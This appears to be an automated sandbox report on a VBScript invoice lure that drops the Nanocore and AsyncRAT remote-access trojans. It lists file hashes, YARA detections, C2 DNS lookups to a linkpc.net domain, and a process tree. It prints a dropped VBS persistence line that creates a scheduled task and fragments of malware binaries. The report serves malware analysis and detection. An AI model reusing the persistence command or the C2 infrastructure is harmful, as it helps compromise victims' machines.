                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                            • Antivirus: Metadefender, Detection: 91%, Browse
                                            • Antivirus: ReversingLabs, Detection: 100%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                            C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:ASCII text, with CR, LF line terminators
                                            Category:dropped
                                            Size (bytes):221
                                            Entropy (8bit):4.520339522389818
                                            Encrypted:false
                                            SSDEEP:3:jmSGFEm8nsFy0ijQLHBD/uOuG+rBTNAW23e6wDnoNN+EaKC5eiFpFVLjN:jaNqsE61/u5FBzk/wjoNN7aZ5e6/
                                            MD5:13B68193AE7BF8E04468F23B2F878751
                                            SHA1:FBCB57D90B7ADFEB963E54ED0000610B6F88B939
                                            SHA-256:97931461E7E1E8D01E0045A33E823D4B25AB89A7FC2BDD2A6BC79FE45DCF34C4
                                            SHA-512:598E9805A89BB3CD386554C8A946EC28217B781DDA76106E4B45304EAC3FCDA1EE858CDCBB3D64E3F4A46F17B5EBE6AE72096921FEADF4190B1C65D6B03A8E14
                                            Malicious:true
                                            Preview: Set wshShell = CreateObject("WScript.Shell") ..ret = wshShell.Run ("schtasks /create /sc onlogon /rl highest /tn Notepads.exe /tr ""C:\Users\user\AppData\Roaming\Notepads.exe", 0, False)
                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                            Process:C:\Users\user\AppData\Local\Temp\fi.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8
                                            Entropy (8bit):3.0
                                            Encrypted:false
                                            SSDEEP:3:Iq8:Iq8
                                            MD5:CC22F0048AEA8CDC7CFBCF7E10818E98
                                            SHA1:D27C83B167C3FAA39B8B9D10ECDB01D244D18A55
                                            SHA-256:35A0A75FA2AC5DF4A72BC15E1C68536D4B09C9EFB506BC3CF8CF33AD207AAAC1
                                            SHA-512:DCEA6835062629A748B948870ED47A5BF6F6E245A654D44E3240B9F0BCC20D1EF33BA417F66CE8FB2608342D1F89B5C2796FA521A95EC7B0D718333D4F95F2CF
                                            Malicious:true
                                            Preview: .W..j..H
                                            C:\Users\user\AppData\Roaming\Notepads.exe
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):121856
                                            Entropy (8bit):5.7883947305405865
                                            Encrypted:false
                                            SSDEEP:3072:eXPeQ7X4XTwzyt1IeqsH/ebouOtyr3OrKHDU:g7X4XTIytGeqsH/ebdOtvE
                                            MD5:F7F64EC1756119F19D52FB140E22382F
                                            SHA1:C4FA973B801D954562FE00AC7BD2C6D051AE6E2F
                                            SHA-256:C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
                                            SHA-512:F29A10012A4E7EF6989BCEA75554B12A17415FBA4D8181C6A2B3AE0E663FE59B4C5ED910583F898D5C36A5178041A9ADCF92EC758B45CEA082165E596D7061BA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Notepads.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 76%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            • Filename: SpecPDF.vbs, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........."...0.................. ........@.. .......................@............@.....................................K.......v.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...v...........................@..@.reloc....... ......................@..B........................H............'............................................................/.\......V..;...$0.xC.=VD..b......9A..{....*..{....*..{ ...*r.(!.....}......}......} ...*..(!...*..{....*"..}....*..{....*...}......sH...}......sL...}....*f.(!.....(.....s!...(....*..{....*"..}....*j.(!.....sH...}......((...*..{....*"..}....*..*..*..{....*"..}....*v..(......2.s>...(?.....}'...*V..P.{)....{*...or...*..,......ioI......{,....{-...or...*.~....*.......*.~/...*.../...*.~0...*...0...*.~1...*

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines, with CRLF line terminators
                                            Entropy (8bit):5.625953655922885
                                            TrID:
                                            • Visual Basic Script (13500/0) 100.00%
                                            File name:Invoice No F1019855_PDF.vbs
                                            File size:498648
                                            MD5:ce4dcec84bfeba49404fa70f5d137645
                                            SHA1:c31021953c59af126d0095bea70c26ca02a2d954
                                            SHA256:ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
                                            SHA512:206f93128c63f78891cd55aff0a2ffe74696845df2f1d2a359bd569716f2a8a7d68c9b12c724c3b5e35963664eba8ce41d8eb65c54f5f36d256fb850635e7b01
                                            SSDEEP:12288:hpwkVfVJwJJTtAm+7Jx1zCBEDiBsrvODJ2+oDhX+K2jid:/wkVfsJoz8srvOXoZdMid
                                            File Content Preview:on error resume next..Dim gTzLXUWzCBikJZhvnBenaiztweMohtxHSfLxABGzBuMkSVcBIAEZctzxUFPtIhRIDbRdOkvmvemfWPbaCKghoYeYgNculNrTdDgqDynYESexHTbFdpqxBjTfwtxAHAAhnSCSikWDXIdVuhRMmXRvWuSujBuKBmQDSwKpRJWsTmZtGykPbkOkjELsAIihqLClrZDyWcvcAYc..'jUYnlQfiRYgTNkRoIapCHko

                                            File Icon

                                            Icon Hash:e8d69ece869a9ec4

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            05/04/21-19:09:41.909556 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:41.947594 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 84.17.52.126 | 192.168.2.6
                                            05/04/21-19:09:41.948113 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:41.983261 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 5.56.20.161 | 192.168.2.6
                                            05/04/21-19:09:41.983749 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:42.024316 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 81.95.15.57 | 192.168.2.6
                                            05/04/21-19:09:42.024859 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:42.066114 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 152.195.101.202 | 192.168.2.6
                                            05/04/21-19:09:42.066597 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:42.125981 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 152.195.101.129 | 192.168.2.6
                                            05/04/21-19:09:42.126280 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:42.166881 | ICMP | 408 | ICMP Echo Reply | | | 93.184.221.240 | 192.168.2.6
                                            05/04/21-19:09:51.927237 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
                                            05/04/21-19:09:52.614087 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
                                            05/04/21-19:09:53.652130 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8

                                            Network Port Distribution

                                            TCP Packets


                                            UDP Packets


                                            ICMP Packets

                                            Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                            May 4, 2021 19:09:51.927237034 CEST | 192.168.2.6 | 8.8.8.8 | d008 | (Port unreachable) | Destination Unreachable
                                            May 4, 2021 19:09:52.614087105 CEST | 192.168.2.6 | 8.8.8.8 | d008 | (Port unreachable) | Destination Unreachable
                                            May 4, 2021 19:09:53.652129889 CEST | 192.168.2.6 | 8.8.8.8 | d008 | (Port unreachable) | Destination Unreachable

                                            DNS Queries

                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                            May 4, 2021 19:09:47.388607979 CEST | 192.168.2.6 | 8.8.8.8 | 0x1f2a | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:48.446315050 CEST | 192.168.2.6 | 8.8.8.8 | 0x1f2a | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:49.476988077 CEST | 192.168.2.6 | 8.8.8.8 | 0x1f2a | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:51.483484030 CEST | 192.168.2.6 | 8.8.8.8 | 0x1f2a | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:57.843883038 CEST | 192.168.2.6 | 8.8.8.8 | 0xa655 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:09.150386095 CEST | 192.168.2.6 | 8.8.8.8 | 0x6c53 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:32.124850988 CEST | 192.168.2.6 | 8.8.8.8 | 0xb54c | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:38.339664936 CEST | 192.168.2.6 | 8.8.8.8 | 0x7013 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:44.418627977 CEST | 192.168.2.6 | 8.8.8.8 | 0xae48 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:07.055581093 CEST | 192.168.2.6 | 8.8.8.8 | 0x8756 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:13.231501102 CEST | 192.168.2.6 | 8.8.8.8 | 0x7be | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:19.050941944 CEST | 192.168.2.6 | 8.8.8.8 | 0xbae2 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:34.072407007 CEST | 192.168.2.6 | 8.8.8.8 | 0x2258 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:39.420672894 CEST | 192.168.2.6 | 8.8.8.8 | 0xf9f0 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:43.058330059 CEST | 192.168.2.6 | 8.8.8.8 | 0x9541 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:44.819533110 CEST | 192.168.2.6 | 8.8.8.8 | 0x645d | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:51.660826921 CEST | 192.168.2.6 | 8.8.8.8 | 0xeab6 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:51.930774927 CEST | 192.168.2.6 | 8.8.8.8 | 0x4cd3 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:52.674628973 CEST | 192.168.2.6 | 8.8.8.8 | 0xeab6 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:52.940547943 CEST | 192.168.2.6 | 8.8.8.8 | 0x4cd3 | Standard query (0) | sys2021.linkpc.net | A (IP address) | IN (0x0001)

                                            DNS Answers

                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                            May 4, 2021 19:09:51.643963099 CEST | 8.8.8.8 | 192.168.2.6 | 0x1f2a | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:51.927154064 CEST | 8.8.8.8 | 192.168.2.6 | 0x1f2a | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:52.613918066 CEST | 8.8.8.8 | 192.168.2.6 | 0x1f2a | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:53.652007103 CEST | 8.8.8.8 | 192.168.2.6 | 0x1f2a | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:57.901256084 CEST | 8.8.8.8 | 192.168.2.6 | 0xa655 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:09.302356005 CEST | 8.8.8.8 | 192.168.2.6 | 0x6c53 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:32.284786940 CEST | 8.8.8.8 | 192.168.2.6 | 0xb54c | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:38.388328075 CEST | 8.8.8.8 | 192.168.2.6 | 0x7013 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:44.475996017 CEST | 8.8.8.8 | 192.168.2.6 | 0xae48 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:07.113138914 CEST | 8.8.8.8 | 192.168.2.6 | 0x8756 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:13.282305002 CEST | 8.8.8.8 | 192.168.2.6 | 0x7be | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:19.108181953 CEST | 8.8.8.8 | 192.168.2.6 | 0xbae2 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:34.134166002 CEST | 8.8.8.8 | 192.168.2.6 | 0x2258 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:39.478065014 CEST | 8.8.8.8 | 192.168.2.6 | 0xf9f0 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:43.115463972 CEST | 8.8.8.8 | 192.168.2.6 | 0x9541 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:44.879615068 CEST | 8.8.8.8 | 192.168.2.6 | 0x645d | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:52.723125935 CEST | 8.8.8.8 | 192.168.2.6 | 0xeab6 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:52.997445107 CEST | 8.8.8.8 | 192.168.2.6 | 0x4cd3 | No error (0) | sys2021.linkpc.net | - | 79.137.109.121 | A (IP address) | IN (0x0001)

                                            Code Manipulations

                                            Statistics

                                            Behavior


                                            System Behavior

                                            General

                                            Start time:19:09:42
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
                                            Imagebase:0x7ff6f47f0000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, Author: Florian Roth
                                             • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:high

                                            General

                                            Start time:19:09:44
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Local\Temp\ame.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\AppData\Local\Temp\ame.exe'
                                            Imagebase:0x500000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ame.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                             • Detection: 62%, Virustotal
                                            • Detection: 76%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:19:09:44
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Local\Temp\fi.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Local\Temp\fi.exe'
                                            Imagebase:0x40000
                                            File size:207360 bytes
                                            MD5 hash:86A588C5A10A04AF998DBAD9FF9A31D1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, Author: Florian Roth
                                             • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, Author: Florian Roth
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Florian Roth
                                             • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                             • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                             • Detection: 81%, Virustotal
                                             • Detection: 91%, Metadefender
                                            • Detection: 100%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:19:09:56
                                            Start date:04/05/2021
                                            Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                            Imagebase:0xc40000
                                            File size:207360 bytes
                                            MD5 hash:86A588C5A10A04AF998DBAD9FF9A31D1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                             • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                             • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                             • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                             • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                             • Detection: 81%, Virustotal
                                             • Detection: 91%, Metadefender
                                            • Detection: 100%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:19:11:18
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
                                            Imagebase:0x7ff6f47f0000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:19:11:19
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\AppData\Roaming\Notepads.exe'
                                            Imagebase:0xee0000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Notepads.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 76%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:19:11:19
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
                                            Imagebase:0x7ff6992a0000
                                            File size:226816 bytes
                                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:19:11:20
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61de10000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:19:11:22
